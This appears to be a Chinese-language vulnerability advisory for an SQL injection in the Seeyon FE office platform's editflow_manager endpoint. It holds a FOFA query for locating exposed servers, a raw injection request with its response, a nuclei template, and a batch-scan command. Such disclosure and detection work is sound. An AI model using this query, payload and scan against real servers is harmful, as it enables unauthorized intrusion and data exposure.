免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!


漏洞名称

致远互联FE协作办公平台editflow_manager存在sql注入漏洞

漏洞影响

致远互联FE协作办公平台诸多版本都存在该漏洞

漏洞描述

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息。

FOFA搜索语句

title="FE协作办公平台" || body="li_plugins_download"

漏洞复现

向靶场发送如下数据包计算111*222

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

响应内容如下


HTTP/1.1 200 OK
Connection: close
Content-Length: 19
Content-Type: text/html;charset=utf-8
Date: Wed, 13 Dec 2023 01:54:05 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=KXALEDDIWK92000AA305DEE7FF4B5BCDD; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5








24642

响应结果中包含24642证明存在漏洞

nuclei poc

poc文件内容如下


id: seeyon-FE-editflow_manager-sqli

info:
  name: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞
  author: fgz
  severity: high
  description: 致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息,也可能获取服务器控制权。
  metadata:
    fofa-query: title="FE协作办公平台" || body="li_plugins_download"
requests:
  - raw:
      - |
        POST /sysform/003/editflow_manager.js%70 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        
        option=2&GUID=-1'+union+select+111*222--+

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body,'24642')"

运行POC

nuclei.exe -t seeyon-FE-editflow_manager-sqli.yaml -l FE协作办公平台.txt

修复建议

升级到最新版本或者部署WAF。